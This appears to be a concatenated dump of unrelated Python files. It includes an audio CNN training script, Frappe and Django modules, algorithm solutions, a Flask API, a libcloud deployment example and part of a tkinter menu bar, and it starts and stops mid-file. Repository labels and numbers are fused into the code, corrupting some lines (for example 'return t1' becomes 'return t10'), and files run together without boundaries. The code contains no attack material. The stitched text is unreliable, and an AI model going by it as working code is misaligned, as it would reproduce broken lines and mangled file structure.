ConvBlock(in_channels=64, out_channels=128, kernel_size=(5, 5), stride=(2, 2), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) self.conv_block_6 = ConvBlock(in_channels=128, out_channels=256, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), batchnorm=True, maxpool=False, maxpool_size=None, dropout=DROPOUT) ## combine output of conv_block_6 with VGG-ish embedding self.fc1 = nn.Bilinear(256, 1280, 512, bias=True) self.fc1_bn = nn.BatchNorm1d(512) self.fc2 = nn.Linear(512, 256, bias=True) self.fc2_bn = nn.BatchNorm1d(256) self.fc_final = nn.Linear(256, NUM_CLASSES, bias=True) self.fc_dropout = nn.Dropout(.2) def forward(self, nn_input): x, vgg = nn_input # (spectrogram, vggish) # spectrogram convolutions x = self.conv_block_1(x) x = self.conv_block_2(x) x = self.conv_block_3(x) x = self.conv_block_4(x) x = self.conv_block_5(x) x = self.conv_block_6(x) # flatten conv layer and vgg-ish embeddings for fc layers x = x.view(x.size(0), -1) vgg = vgg.view(vgg.size(0), -1) ## fully-connected layers x = self.fc1(x, vgg) x = self.fc1_bn(x) x = F.relu(x) x = self.fc_dropout(x) x = self.fc2(x) x = self.fc2_bn(x) x = F.relu(x) x = self.fc_dropout(x) x = self.fc_final(x) output = x return output if __name__ == '__main__': model = AudioCNN().to(device) ## if training from checkpoint, ensure checkpoint matches model class architecture if CHECKPOINT: checkpoint = torch.load(CHECKPOINT_PATH) model.load_state_dict(checkpoint) ## Loss function if WEIGHT_SMOOTHING: criterion = nn.BCEWithLogitsLoss( pos_weight=torch.tensor(np.array(TRAIN_WEIGHTS).astype(np.float32)**WEIGHT_SMOOTHING).to(device)) else: criterion = nn.BCEWithLogitsLoss() # Train the model starting_lr = .01 #.001 lr = starting_lr min_lr = 1e-6 stagnation = 0 stagnation_threshold = 10 reduce_lr_rate = .1 running_loss = 0 train_losses, test_losses = [], [] best_micro_auprc_coarse = 0 best_micro_auprc_fine = 0 # TODO: print epoch, train_loss, val_loss, micro_auprc, etc. optimizer = torch.optim.Adam(model.parameters(), lr=starting_lr) for epoch in range(NUM_EPOCHS): epoch_losses = [] if stagnation > stagnation_threshold: if lr <= min_lr: lr = starting_lr optimizer = torch.optim.Adam(model.parameters(), lr=lr) reduce_lr_rate += .1 print('.' * 50) print('reset learning rate to', lr) print('.' * 50) stagnation = 0 else: lr = lr * reduce_lr_rate optimizer = torch.optim.Adam(model.parameters(), lr=lr) print('.' * 50) print('reduced learning rate to', lr) print('.' 
* 50) stagnation = 0 for i, (spectrogram, label) in enumerate(TRAIN_LOADER): # Forward pass outputs = model(spectrogram) loss = criterion(outputs, label) epoch_losses.append(loss.item()) # Backward and optimize optimizer.zero_grad() loss.backward() optimizer.step() print('Epoch:', epoch) print('lr:', lr) print('Train loss:', np.mean(np.array(epoch_losses))) test_loss = 0 accuracy = 0 model.eval() ## get AUPRC scores with torch.no_grad(): make_prediction_csv(model, PREDICTION_PATH, mode=TRAIN_MODE, embed=True, test_path=test_dir) df_dict = evaluate(PREDICTION_PATH, ANNOTATIONS_PATH, YAML_PATH, 'coarse') df_dict_fine = evaluate(PREDICTION_PATH, ANNOTATIONS_PATH, YAML_PATH, 'fine') micro_auprc, eval_df = micro_averaged_auprc(df_dict, return_df=True) micro_auprc_fine, eval_df_fine = micro_averaged_auprc(df_dict_fine, return_df=True) print('Micro_AUPRC Coarse:', micro_auprc) print('Micro_AUPRC Fine:', micro_auprc_fine) if micro_auprc > best_micro_auprc_coarse or micro_auprc_fine > best_micro_auprc_fine: name, ext = os.path.splitext(PREDICTION_PATH) shutil.copy(PREDICTION_PATH, f'{name}_best_coarse={micro_auprc:.3f}_fine={micro_auprc_fine:.3f}{ext}') torch.save(model.state_dict(), f'models/{RUN_NAME}_coarse={micro_auprc:.3f}_fine={micro_auprc_fine:.3f}.ckpt') best_micro_auprc_coarse = micro_auprc best_micro_auprc_fine = micro_auprc_fine stagnation = 0 print('Best so far') else: stagnation += 1 print('Stagnation:', stagnation) print() model.train()1-10 # -*- coding: utf-8 -*- # Copyright (c) 2019, and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from datetime import datetime, timedelta class InsuranceAuthorization(Document): pass @frappe.whitelist() def get_patient_encounter(name): PE_fields = ["name", "patient", "encounter_date", "encounter_time", "practitioner", 'encounter_comment'] PE = frappe.get_value('Patient Encounter', name, PE_fields) code_fields = ['medical_code', 'code', 'description'] code = frappe.get_all('Codification Table', {'parent': PE[0]}, code_fields) return PE, code, to_datetime(PE[2],PE[3]) def to_datetime(d,t): date = d.strftime('%Y-%m-%d') time = str(t) d = date+" "+time return datetime.strptime(d, '%Y-%m-%d %H:%M:%S') ``` What if you cannot modify the input array, and you want to avoid copying it due to memory constraints? We can adapt the hashset approach above to work for an unsorted array. We can put a combination of three values into a hashset to avoid duplicates. Values in a combination should be ordered (e.g. ascending). Otherwise, we can have results with the same values in the different positions. Algorithm The algorithm is similar to the hashset approach above. We just need to add few optimizations so that it works efficiently for repeated values: Use another hashset dups to skip duplicates in the outer loop. Without this optimization, the submission will time out for the test case with 3,000 zeroes. This case is handled naturally when the array is sorted. Instead of re-populating a hashset every time in the inner loop, we can use a hashmap and populate it once. Values in the hashmap will indicate whether we have encountered that element in the current iteration. When we process nums[j] in the inner loop, we set its hashmap value to i. This indicates that we can now use nums[j] as a complement for nums[i]. This is more like a trick to compensate for container overheads. The effect varies by language, e.g. for C++ it cuts the runtime in half. 
Without this trick the submission may time out. ``` class Solution: def threeSum(self, nums: List[int]) -> List[List[int]]: res, dups = set(), set() seen = {} for i, val1 in enumerate(nums): if val1 not in dups: dups.add(val1) for j, val2 in enumerate(nums[i+1:]): complement = -val1 - val2 if complement in seen and seen[complement] == i: res.add(tuple(sorted((val1, val2, complement)))) seen[val2] = i return res ``` Complexity Analysis Time Complexity: O(n^2). We have outer and inner loops, each going through n elements. While the asymptotic complexity is the same, this algorithm is noticeably slower than the previous approach. Lookups in a hashset, though constant time, are expensive compared to direct memory access. Space Complexity: O(n) for the hashset/hashmap. For the purpose of complexity analysis, we ignore the memory required for the output. However, in this approach we also store the output in the hashset for deduplication. In the worst case, there could be O(n^2) triplets in the output, like for this example: [-k, -k + 1, ..., -1, 0, 1, ..., k - 1, k]. Adding a new number to this sequence will produce n / 3 new triplets. ```
from rlagent.noises.ounoise import OUNoise
from .sub_ba import print_name_sublib_sub_ba
import sys import os import csv import json def build_feature(row): feature = { "type": "Feature", "geometry": { "type": "Point", "coordinates": [row['Longitude'], row['Latitude']] }, "properties": {k: v for k, v in row.items() if k not in ['stop_lon', 'stop_lat']} } return feature if __name__ == "__main__": if len(sys.argv) == 1: print("usage: csv-to-geojson ") sys.exit(1) gtfs_file = sys.argv[1] outfile = None if len(sys.argv) == 3: outfile = sys.argv[2] # skeleton json object geojson_out = { "type": "FeatureCollection", "features": [] } if not os.path.exists(gtfs_file): print("usage: csv-to-geojson ") sys.exit(1) # read in the gtfs/csv with open(gtfs_file, "r") as gtfs: for row in csv.DictReader(gtfs): geojson_out['features'].append(build_feature(row)) # write the json file try: if not outfile: outfile = gtfs_file.split('.') outfile = outfile[0] + '.json' json_data = json.dumps(geojson_out, indent=2) fd = open(outfile, 'w') fd.write(json_data) fd.close() except Exception as e: raise from polecat import model def build_test_model(field_hook=None): class TestModel(model.Model): field = model.IntField(hooks=field_hook) return TestModel def test_field_hook(push_blueprint): called = 0 def test_field_hook(blueprint): nonlocal called called += 1 build_test_model(field_hook=test_field_hook) push_blueprint.run_hooks() assert called == 1 # If not stated otherwise in this file or this component's license file the # following copyright and licenses apply: # # Copyright 2020 Consult Red # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License.
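For quick reference, the flattened no-sort `threeSum` block above can be read as the following self-contained sketch. The sample input in the `__main__` guard is purely illustrative, and the final conversion to a list of lists is added here only so the result matches the annotated `List[List[int]]` return type (the original returns the raw set of tuples).
```
from typing import List


class Solution:
    def threeSum(self, nums: List[int]) -> List[List[int]]:
        # dups: values already processed as val1, so duplicate first elements are skipped.
        # seen: maps a value to the outer-loop index at which it was last seen, so
        #       `seen[complement] == i` means the complement already appeared in this pass.
        res, dups = set(), set()
        seen = {}
        for i, val1 in enumerate(nums):
            if val1 not in dups:
                dups.add(val1)
                for val2 in nums[i + 1:]:
                    complement = -val1 - val2
                    if complement in seen and seen[complement] == i:
                        res.add(tuple(sorted((val1, val2, complement))))
                    seen[val2] = i
        # Convert the deduplicated tuples to the annotated list-of-lists shape.
        return [list(triplet) for triplet in res]


if __name__ == "__main__":
    # Illustrative input; expected output (in any order): [[-1, -1, 2], [-1, 0, 1]]
    print(Solution().threeSum([-1, 0, 1, 2, -1, -4]))
```
The `seen[complement] == i` check is what restricts complements to values already visited within the current outer iteration, which is the detail that keeps the approach correct without sorting.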
import os import json import click from loguru import logger class STBPlatform: def __init__(self, name, search_path=None): self.name = name # Default to looking in the source code templates directory if not search_path: self.search_path = os.path.abspath(os.path.join( os.path.dirname(__file__), os.pardir, os.pardir, 'templates')) else: self.search_path = search_path # Find config files for the platform self.search_config() # Parse the configs we just found if self.found_config(): self.parse_config() # ========================================================================== def search_config(self): """Search for a config file for the specified platform Config files should live in the templates directory or a custom directory """ # Loop through all the dirs, looking for a .json and # _libs.json file config_files = [] for subdir, dirs, files in os.walk(self.search_path): for file in files: if self.name in file: # Found a suitable config file config_path = os.path.join(subdir, file) config_files.append(config_path) logger.debug(f"Found platform config {config_path}") self.config_files = config_files # ========================================================================== def parse_config(self): """Parse the platform config files into a python dictionary """ dictionary_list = [] # Load all the config files for file in self.config_files: with open(file) as jsonFile: data = json.load(jsonFile) dictionary_list.append(data) # Merge all the config files into one dictionary self.config = {} for dict in dictionary_list: self.config.update(dict) # ========================================================================== def found_config(self): """Returns true if at least one config file was found for the platform Returns: bool: True if at least one config found """ return len(self.config_files) > 0 def get_config(self): """Returns the config dictionary for the platform Returns: dictionary: the config dictionary for the platform """ return self.config class MetricLogger: r"""Keeps track of training and validation curves, by recording: - Last value of train and validation metrics. - Train and validation metrics corresponding to maximum or minimum validation metric value. - Exponential moving average of train and validation metrics. Args: smoothing_factor (float, Optional): Smoothing factor used in exponential moving average. (default: :obj:`0.4`). max (bool, Optional): If :obj:`True`, tracks max value. Otherwise, tracks min value. (default: :obj:`True`). 
""" def __init__(self, smoothing_factor=0.4, max=True): self.smoothing_factor = smoothing_factor self.max = max # init variables # last self.train_last = None self.val_last = None self.test_last = None # moving average self.train_smooth = None self.val_smooth = None self.test_smooth = None # max self.train_minmax = None self.val_minmax = None self.test_minmax = None self.step_minmax = None def __repr__(self): out = "Last: (Train) %.4f (Val) %.4f\n" % (self.train_last, self.val_last) out += "Smooth: (Train) %.4f (Val) %.4f\n" % (self.train_smooth, self.val_smooth) out += "Max: (Train) %.4f (Val) %.4f\n" % (self.train_minmax, self.val_minmax) return out def update(self, train_value, val_value, test_value=0., step=None): # last values self.train_last = train_value self.val_last = val_value self.test_last = test_value # exponential moving average self.train_smooth = self.smoothing_factor * train_value + (1 - self.smoothing_factor) * self.train_smooth \ if self.train_smooth is not None else train_value self.val_smooth = self.smoothing_factor * val_value + (1 - self.smoothing_factor) * self.val_smooth \ if self.val_smooth is not None else val_value self.test_smooth = self.smoothing_factor * test_value + (1 - self.smoothing_factor) * self.test_smooth \ if self.test_smooth is not None else test_value # max/min validation accuracy if self.val_minmax is None or (self.max and self.val_minmax < val_value) or \ (not self.max and self.val_minmax > val_value): self.train_minmax = train_value self.val_minmax = val_value self.test_minmax = test_value if step: self.step_minmax = step def __getattr__(self, item): if item not in ['train_min', 'train_max', 'val_min', 'val_max', 'test_min', 'test_max']: raise AttributeError if self.max and item in ['train_min', 'val_min', 'test_min']: raise AttributeError('Tracking maximum values, not minimum.') if not self.max and item in ['train_max', 'val_max', 'test_max']: raise AttributeError('Tracking minimum values, not maximum.') if 'train' in item: return self.train_minmax elif 'val' in item: return self.val_minmax elif 'test' in item: return self.test_minmax andreacarriero/infrastructure-cc1-10 import logging from flask import Blueprint, abort from flask_restful import Api, Resource, reqparse from toolbox.logger import get_logger from modules.project.models import Project, ResourceNodeLink, ProjectCommandJob from modules.user.models import User from modules.node.models import Node, NodeCommand log = get_logger(__name__) app = Blueprint(__name__, __name__) api = Api(app) class RootResource(Resource): """ Manages Projects """ def get(self): log.info("Getting all projects") projects = Project.query.all() return [project.serialize() for project in projects] class ProjectResource(Resource): """ Manages specific project """ def get(self, project_id): log.info("Getting project ID:%d", project_id) project = Project.query.filter_by(id=project_id).first() if not project: abort(404) user = User.query.filter_by(id=project.user_id).first() nodes_links = ResourceNodeLink.query.filter_by(project_id=project_id).all() project_command_jobs = ProjectCommandJob.query.filter_by(project_id=project_id).all() return { 'project': project.serialize(), 'user': user.serialize(), 'nodes': [link.serialize_node() for link in nodes_links], 'project_command_jobs': [job.serialize() for job in project_command_jobs] } class ProjectCommandJobResource(Resource): """ Manages specific command job """ def get(self, project_id, job_id): log.info("Getting job ID:%d", job_id) job = 
ProjectCommandJob.query.filter_by(id=job_id).first() if not job: abort(404, "Project Command Job not found") node_commands = NodeCommand.query.filter_by(project_command_job_id=job_id).all() return { 'project_command_job': job.serialize(), 'node_commands': [command.serialize() for command in node_commands] } api.add_resource(RootResource, '/', endpoint='projects') api.add_resource(ProjectResource, '/', endpoint='project') api.add_resource(ProjectCommandJobResource, '//jobs/', endpoint='project_command_job') 1-10 # customformatter.py # Defines a logging formatter to customize the logger's output: # - sets the format: "time - logger - level - log (file:line)" # - adds colour to the levels import logging class CustomFormatter(logging.Formatter): """ Custom logging formatter to colour-code the levels. """ # Colours for formatting console text BLUE = '\033[94m' CYAN = '\033[96m' YELLOW = '\033[93m' RED = '\033[91m' BOLDRED = '\033[31;20m' ENDC = '\033[0m' # The extra spaces are intended, just in case. format_prefix = "%(asctime)s - " format_level = "%(levelname)s" format_body = " - %(message)s (%(module)s:%(funcName)s:%(lineno)d)" FORMATS = { logging.DEBUG: format_prefix + BLUE + format_level + ENDC + format_body, logging.INFO: format_prefix + CYAN + format_level + ENDC + format_body, logging.WARNING: format_prefix + YELLOW + format_level + ENDC + format_body, logging.ERROR: format_prefix + RED + format_level + ENDC + format_body, logging.CRITICAL: format_prefix + BOLDRED + format_level + ENDC + format_body, } def format(self, record: logging.LogRecord): log_fmt = self.FORMATS.get(record.levelno) formatter = logging.Formatter(log_fmt) return formatter.format(record) TommyWongww/killingCodes # @Time : 2019/4/25 23:48 # @Author : shakespere # @FileName: Merge Two Binary Trees.py ''' 617. Merge Two Binary Trees Easy Given two binary trees and imagine that when you put one of them to cover the other, some nodes of the two trees are overlapped while the others are not. You need to merge them into a new binary tree. The merge rule is that if two nodes overlap, then sum node values up as the new value of the merged node. Otherwise, the NOT null node will be used as the node of new tree. Example 1: Input: Tree 1 Tree 2 1 2 / \ / \ 3 2 1 3 / \ \ 5 4 7 Output: Merged tree: 3 / \ 4 5 / \ \ 5 4 7 Note: The merging process must start from the root nodes of both trees. ''' # Definition for a binary tree node. 
# class TreeNode(object): # def __init__(self, x): # self.val = x # self.left = None # self.right = None class Solution(object): def mergeTrees(self, t1, t2): """ :type t1: TreeNode :type t2: TreeNode :rtype: TreeNode """ if not t1: return t2 if not t2: return t1 t1.val+=t2.val t1.left = self.mergeTrees(t1.left,t2.left) t1.right = self.mergeTrees(t1.right,t2.right) return t10 from django.contrib.auth.models import update_last_login from django.contrib.auth.signals import user_logged_in from ngw.core.models import Contact # Ugly work around for NOT using update_last_login that is hardcoded in # crontrib.auth : user_logged_in.disconnect(update_last_login) class NgwAuthBackend(object): """ Authenticate a user """ # required by contrib.auth: supports_inactive_user = False def authenticate(self, request, username=None, password=None): if not username or not password: return None try: contact = Contact.objects.get_by_natural_key(username) except (Contact.DoesNotExist, Contact.MultipleObjectsReturned): return None if contact.check_password(password): contact.update_lastconnection() return contact return None # authentification failed def get_user(self, user_id): try: return Contact.objects.get(pk=user_id) except Contact.DoesNotExist: return None girardinsamuel/health """Masonite Health Settings""" """ |-------------------------------------------------------------------------- | A Heading of The Setting Being Set |-------------------------------------------------------------------------- | | A quick description | """ SETTING = "some value" from typing import Any, Dict class PipelineToken: value: str hashval: str model: str server: str method: str params: Dict[str, str] queries: Dict[str, Any] def __init__(self, model: str, server: str, method: str, params: Dict[str, str], queries: Dict[str, Any]): self.model = model self.server = server self.method = method self.params = params self.queries = queries if self.server: self.parent = f"{self.model}/{self.server}/{self.method}" else: self.parent = f"{self.model}/{self.method}" self.value = f"{self.parent}{self.parse_params(self.params)}{self.parse_queries(self.queries)}" self.hashval = hash((self.model, self.server, self.method, str(self.params), str(self.queries))) def __hash__(self): return self.hashval @staticmethod def parse_params(dic: Dict) -> str: res = "/".join(str(v) for v in dic.values()) return "/" + res if res else "" @staticmethod def parse_queries(dic: Dict) -> str: res = "&".join(f"{k}={v}" for k, v in dic.items()) return "?" + res if res else "" def dict(self) -> dict: return { "model": self.model, "server": self.server, "method": self.method, "params": self.params, "queries": self.queries, } @classmethod def load(cls, dic) -> 'PipelineToken': return cls(dic["model"], dic["server"], dic["method"], dic["params"], dic["queries"]) sunny-khatik/060_SunnyKhatik #from google.colab import drive #drive.mount("/content/drive") # Step 1: Import Libraries import numpy as np import pandas as pd from sklearn.impute import SimpleImputer # Step 2: Load Data datasets = pd.read_csv('Data_for_Missing_Values.csv') print("\nData :\n",datasets) print("\nData statistics\n",datasets.describe()) # Step 4: Find the missing values and handle it in either way # 4a. Removing the row with all null values datasets.dropna(how='all',inplace=True) print("\nNew Data :",datasets) # 4b. 
Imputation (Replacing null values with mean value of that attribute) # All rows, all columns except last new_X = datasets.iloc[:, :-1].values # Only last column new_Y = datasets.iloc[:, -1].values # Using Imputer function to replace NaN values with mean of that parameter value imputer = SimpleImputer(missing_values = np.nan,strategy = "mean") # Fitting the data, function learns the stats imputer = imputer.fit(new_X[:, 1:3]) # fit_transform() will execute those stats on the input ie. X[:, 1:3] new_X[:, 1:3] = imputer.transform(new_X[:, 1:3]) # filling the missing value with mean print("\n\nNew Input with Mean Value for NaN : \n\n", new_X) import json from pprint import pprint import matplotlib.pyplot as plt with open('flows.json') as data_file: data = json.load(data_file) pprint(data) for i in data: # Check if greater than 2 or insert a bigger more reasonable value if(len(i['values']['delta_bps_records'])>=2): plt.plot(i['values']['delta_bps_records']) plt.ylabel('delta_bps') # plt.xlabel( ) plt.title('sourceIPv4Address: ' + str(i['values']['sourceIPv4Address']) +' -> '+ 'sourceTransportPort: ' + str(i['values']['sourceTransportPort']) +'\n'+ 'destinationIPv4Address: ' + str(i['values']['destinationIPv4Address']) +' -> '+ 'destinationTransportPort: ' + str(i['values']['destinationTransportPort']) ) plt.show()0 from __future__ import with_statement import os from libcloud.compute.types import Provider from libcloud.compute.providers import get_driver from libcloud.compute.deployment import ScriptDeployment # Path to the private SSH key file used to authenticate PRIVATE_SSH_KEY_PATH = os.path.expanduser("~/.ssh/id_rsa_gce") # Path to the public SSH key file which will be installed on the server for # the root user PUBLIC_SSH_KEY_PATH = os.path.expanduser("~/.ssh/id_rsa_gce.pub") with open(PUBLIC_SSH_KEY_PATH, "r") as fp: PUBLIC_SSH_KEY_CONTENT = fp.read().strip() # GCE authentication related info SERVICE_ACCOUNT_USERNAME = "@.iam.gserviceaccount.com" SERVICE_ACCOUNT_CREDENTIALS_JSON_FILE_PATH = "/path/to/sac.json" PROJECT_ID = "my-gcp-project" Driver = get_driver(Provider.GCE) driver = Driver( SERVICE_ACCOUNT_USERNAME, SERVICE_ACCOUNT_CREDENTIALS_JSON_FILE_PATH, project=PROJECT_ID, datacenter="us-central1-a", ) step = ScriptDeployment("echo whoami ; date ; ls -la") images = driver.list_images() sizes = driver.list_sizes() image = [i for i in images if i.name == "ubuntu-1604-xenial-v20191217"][0] size = [s for s in sizes if s.name == "e2-micro"][0] print("Using image: %s" % (image)) print("Using size: %s" % (size)) # NOTE: We specify which public key is installed on the instance using # metadata functionality. # Keep in mind that this step is only needed if you want to install a specific # key which is used to run the deployment script. # If you are using a VM image with a public SSH key already pre-baked in or if # you use project wide ssh-keys GCP functionality, you can remove ex_metadata # argument, but you still need to make sure the private key you use inside this # script matches the one which is installed / available on the server. ex_metadata = metadata = { "items": [{"key": "ssh-keys", "value": "root: %s" % (PUBLIC_SSH_KEY_CONTENT)}] } # deploy_node takes the same base keyword arguments as create_node. 
node = driver.deploy_node( name="libcloud-deploy-demo-1", image=image, size=size, ex_metadata=metadata, deploy=step, ssh_key=PRIVATE_SSH_KEY_PATH, ) print("") print("Node: %s" % (node)) print("") print("stdout: %s" % (step.stdout)) print("stderr: %s" % (step.stderr)) print("exit_code: %s" % (step.exit_status)) 1-10 # -*- coding: utf-8 -*- # Generated by Django 1.11.3 on 2017-07-29 15:09 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [("accounts", "0005_user_is_staff")] operations = [ migrations.RunSQL( "CREATE UNIQUE INDEX accounts_user_unique_username ON accounts_user (UPPER(username))", "DROP INDEX IF EXISTS accounts_user_unique_username", ) ] """ @brief test log(time=6s) """ import sys import os import unittest from pyquickhelper.ipythonhelper import retrieve_notebooks_in_folder from pyquickhelper.pycode import ExtTestCase class TestNotebookAutomation(ExtTestCase): def test_notebook_retrieve(self): this = os.path.abspath(os.path.dirname(__file__)) nbfile = os.path.join(this, "..", "..", "_doc", "notebooks") self.assertExists(nbfile) res = retrieve_notebooks_in_folder(nbfile) self.assertNotEmpty(res) if __name__ == "__main__": unittest.main() import sys input = sys.stdin.readline def countFacPrime(n, t): step = t result = 0 while n >= step: result += n // step step *= t return result n, m = map(int, input().split()) facN2 = countFacPrime(n, 2) facN5 = countFacPrime(n, 5) facM2 = countFacPrime(m, 2) facM5 = countFacPrime(m, 5) facNM2 = countFacPrime(n-m, 2) facNM5 = countFacPrime(n-m, 5) result = min(facN2-facM2-facNM2, facN5-facM5-facNM5) print(result) """ Copyright 2013 Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
""" import cvxopt import cvxpy.problems.problem as problem import cvxpy.settings as s from boolean import Boolean def branch(booleans): bool_vals = (b for b in booleans if not b.fix_values) # pick *a* boolean variable to branch on # choose the most ambivalent one (smallest distance to 0.5) # NOTE: if there are no boolean variables, will never branch return min(bool_vals, key=lambda x: abs(x.value - 0.5)) def bound(prob, booleans): # relax boolean constraints for bool_var in booleans: bool_var.relax() # solves relaxation lower_bound = prob._solve() if isinstance(lower_bound, str): lower_bound = float('inf') # round boolean variables and re-solve to obtain upper bound for bool_var in booleans: bool_var.round() upper_bound = prob._solve() if isinstance(upper_bound, str): upper_bound = float('inf') return {'gap': upper_bound - lower_bound, 'ub': upper_bound, 'lb': lower_bound, 'obj': upper_bound, 'sol': map(lambda x: x.value, booleans)} def solve_wrapper(prob, i, booleans, depth, epsilon): if i > depth: return None # branch branch_var = branch(booleans) # try true branch branch_var.set(True) true_branch = bound(prob, booleans) # try false branch branch_var.set(False) false_branch = bound(prob, booleans) # keep track of best objective so far if true_branch['obj'] < false_branch['obj']: solution = true_branch else: solution = false_branch # update the bound solution['lb'] = min(true_branch['lb'],false_branch['lb']) solution['ub'] = min(true_branch['ub'],false_branch['ub']) # check if gap is small enough solution['gap'] = solution['ub'] - solution['lb'] if solution['gap'] < epsilon: branch_var.unset() return solution # if the gap isn't small enough, we will choose a branch to go down def take_branch(true_or_false): branch_var.set(true_or_false) if true_or_false is True: branch_bools = true_branch['sol'] else: branch_bools = false_branch['sol'] # restore the values into the set of booleans for b, value in zip(booleans,branch_bools): b.save_value(value) return solve_wrapper(prob, i+1, booleans, depth, epsilon) # partition based on lower bounds if true_branch['lb'] < false_branch['lb']: true_subtree = take_branch(True) false_subtree = take_branch(False) else: false_subtree = take_branch(False) true_subtree = take_branch(True) # propagate best solution up the tree if true_subtree and false_subtree: if true_subtree['obj'] < false_subtree['obj']: return true_subtree return false_subtree if not false_subtree and true_subtree: return true_subtree if not true_subtree and false_subtree: return false_subtree # return best guess so far return solution def branch_and_bound(self, depth: int = 5, epsilon: float = 1e-3): objective, constr_map = self.canonicalize() dims = self._format_for_solver(constr_map, s.ECOS) variables = self.objective.variables() for constr in self.constraints: variables += constr.variables() booleans = [v for v in variables if isinstance(v, Boolean)] self.constraints.extend(b._LB <= b for b in booleans) self.constraints.extend(b <= b._UB for b in booleans) result = bound(self, booleans) # check if gap is small enough if result['gap'] < epsilon: return result['obj'] result = solve_wrapper(self, 0, booleans, depth, epsilon) # set the boolean values to the solution for b, value in zip(booleans, result['sol']): b.save_value(value) b.fix_values = cvxopt.matrix(True, b.size) return result['obj'] # add branch and bound a solution method problem.Problem.register_solve("branch and bound", branch_and_bound) src/ui/menu_bar.py # # DeepRacer Guru # # Version 3.0 onwards # # Copyright (c) 2021 dmh23 # 
from tkinter import Menu, messagebox import src.log.log_utils from src.ui.file_options_dialog import FileOptionsDialog from src.ui.open_file_dialog import OpenFileDialog from src.ui.new_files_dialog import NewFilesDialog from src.ui.episode_filter_dialog import EpisodeFilterDialog from src.ui.action_filter_dialog import ActionSpaceFilterDialog import src.secret_sauce.glue.glue as ss class MenuBar(): def __init__(self, root, main_app, file_is_open:bool, is_continuous_action_space:bool): self.main_app = main_app self.root = root self.menubar = Menu(root) self._file_is_open = file_is_open self._is_continuous_action_space = is_continuous_action_space self._create_menus() def _create_menus(self): self.add_file_menu() self.add_track_menu() if self._file_is_open: self.add_episode_menu() if not self._is_continuous_action_space: self.add_action_menu() self.add_sector_menu() self.add_analyze_menu() self.add_fitting_menu() self.add_zoom_menu() self.add_view_menu() self.add_secret_sauce_menu() self.add_admin_menu() self.root.config(menu=self.menubar) def refresh(self): self.menubar = Menu(self.root) self._create_menus() def add_track_menu(self): existing_log_world_names = src.log.log_utils.get_world_names_of_existing_logs(self.main_app.get_log_directory()) menu = Menu(self.menubar, tearoff=0) if existing_log_world_names: for i, t in enumerate(self.main_app.tracks.values()): if t.get_world_name() in existing_log_world_names: menu.add_command(label=t.get_name_on_menu(), command=lambda track=t: self.choose_track(track)) menu.add_separator() for i, t in enumerate(self.main_app.tracks.values()): if t.get_world_name() not in existing_log_world_names: menu.add_command(label=t.get_name_on_menu(), command=lambda track=t: self.choose_track(track)) self.menubar.add_cascade(label="Track", menu=menu) def add_sector_menu(self): menu = Menu(self.menubar, tearoff=0) for s in self.main_app.current_track.get_all_sector_names(): menu.add_command(label="Sector " + s, command=lambda sector=s: self.choose_sector(sector)) self.menubar.add_cascade(label="Sector", menu=menu) def add_file_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="New File(s)", command=self.new_files) menu.add_command(label="Open File", command=self.open_file) menu.add_command(label="Switch Directory", command=self.main_app.menu_callback_switch_directory) menu.add_separator() menu.add_command(label="Options", command=self.file_options) menu.add_separator() menu.add_command(label="Exit", command=self.root.quit) self.menubar.add_cascade(label="File", menu=menu) def add_zoom_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Zoom - In/Out", command=self.main_app.menu_callback_zoom_in_out) menu.add_separator() for s in self.main_app.current_track.get_all_sector_names(): menu.add_command(label="Sector " + s, command=lambda sector=s: self.zoom_sector(sector)) self.menubar.add_cascade(label="Zoom", menu=menu) def add_view_menu(self): menu = Menu(self.menubar, tearoff=0) menu.add_command(label="Grid - Front", command=self.main_app.menu_callback_grid_front) menu.add_command(label="Grid - Back", command=self.main_app.menu_callback_grid_back) menu.add_command(label="Grid - Off", command=self.main_app.menu_callback_grid_off) menu.add_separator() menu.add_command(label="Analysis - Front", command=self.main_app.menu_callback_analyze_front) menu.add_command(label="Analysis - Back", command=self.main_app.menu_callback_analyze_back) menu.add_separator() menu.add_command(label="Track - Front", 
command=self.main_app.menu_callback_track_front) menu.add_command(label="Track - Back", command=self.main_app.menu_callback_track_back) menu.add_separator() menu.add_command(label="Track - Grey", command=self.main_app.menu_callback_track_grey) menu.add_command(label="Track - Blue", command=self.main_app.menu_callback_track_blue) menu.add_separator() menu.add_command(label="Sectors - On", command=self.main_app.menu_callback_sectors_on) menu.add_command(label="Sectors - Off", command=self.main_app.menu_callback_sectors_off) menu.add_separator() menu.add_command(label="Waypoints - Large", command=self.main_app.menu_callback_waypoints_large) menu.add_command(label="Waypoints - Small", command=self.main_app.menu_callback_waypoints_small) menu.add_command(label="Waypoints - Micro", command=self.main_app.menu_callback_waypoints_micro) menu.add_command(label="Waypoints - Off", command=self.main_app.menu_callback_waypoints_off) menu.add_separator() menu.add_command(label="Waypoint Labels - On", command=self.main_app.menu_callback_waypoint_labels_on) menu.add_command(label="Waypoint Labels - Off", command=self.main_app.menu_callback_waypoint_labels_off) menu.add_separator() menu.add_command(label="Annotations - Front", command=self.main_app.menu_callback_annotations_front) menu.add_command(label="Annotations - Back", command=self.main_app.menu_callback_annotations_back) menu.add_command(label="Annotations - Off", command=self.main_app.menu_callback_annotations_off) menu.add_separator() menu.add_command(label="Heading - On", command=self.main_app.menu_callback_heading_on) menu.add_command(label="Heading - Off", command=self.main_app.menu_callback_heading_off) menu.add_separator() menu.add_command(label="True Bearing - On", command=self.main_app.menu_callback_true_bearing_on) menu.add_command(label="True Bearing - Off", 